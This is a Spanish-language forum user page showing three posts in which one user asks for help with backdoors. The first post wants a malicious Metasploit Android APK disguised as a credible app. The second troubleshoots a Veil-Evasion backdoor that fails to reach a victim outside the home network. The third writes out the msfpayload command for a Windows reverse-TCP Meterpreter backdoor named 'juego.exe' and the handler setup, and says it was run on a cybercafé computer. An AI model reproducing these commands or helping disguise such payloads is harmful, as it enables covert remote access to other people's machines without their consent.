Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - molina25

#1
Hola mi pregunta y que no e encontrado nada parecido para hacerlo , es, bueno me explico:
Tengo creada una apk maliciosa con msfpayload de metasploit pero no es nada creible por el nombre
MainActyvity y por el logo ya que sale el de metasploit alguien sabria como camuflarla en otra aplicacion de android o por lo menos cambiarle el icono y demas lo e intentado descompilandola con apkmanager
y bueno hay una pagina que dice que se puede poner el codigo del payload en otra aplicacion
pero los codigos que salen en dicha pagina no son los mismos de mi apk,
Hber si alguien que me explique como hacer mas creible mi apk maliciosa o como camuflarla con otra apli y que me de meterpreter por que seamos sinceros si no modificamos nada no es nada creible

Les agradeceria un monton a alguien que me diga como hacer esta tarea por que no soy capazla apk la he creado con kali linux 1.1.0
#2
Hola haber si me podeis echar una mano resulta que cree un backdoor con veil-evasion con kali y para dentro de mi red funciona sin problemas pero lo intente para fuera de mi red abri el puerto 4444 en mi router hacia mi direccion ip interna use el multi handler con el payload de windows/meterpreter reverse/tcp hacia mi ip interna y cuando la victima abrio el backdoor me pone:
send to stage y su ip pero no me inicia el meterpreter como puede ser ya me paso dos veces sale el stage to pero no llega a iniciar meterpreter que hago mal??? en el backdoor lo cree con mi ip externa
pues eso que no me inicia un meterpreter ejjeje puede ser culpa de veil es que con un backdoor normal de msfpayload si me yego a dar un meterpreter fuera de mi red aver si me echais una mano gracias!!!
#3
Hola pues estoy con kali linux y cree un backdoor con meterpreter para instalarselo a un pc de un ciber para practicar lo cree asin:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.. LPORT=4444 x > /root/Desktop/juego.exe
Este backdoor se lo instale en un pc con windows xp service pack3 con el firewall desactivado
y dejé dicho puerto a la escucha con:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168...
set LPORT 4444
exploit -j

luego en el pc victima (el del ciber) hice un netstat -a para ver las conexiones y sale SYN_SENT
en mi conexion ayuda a ver que esta fallando. deje el de mi casa escuchando me fui al ciber con el pendrive y lo ejecute pero no establece conexion, cualquier ayuda lo agradeceria mucho saludos hackers.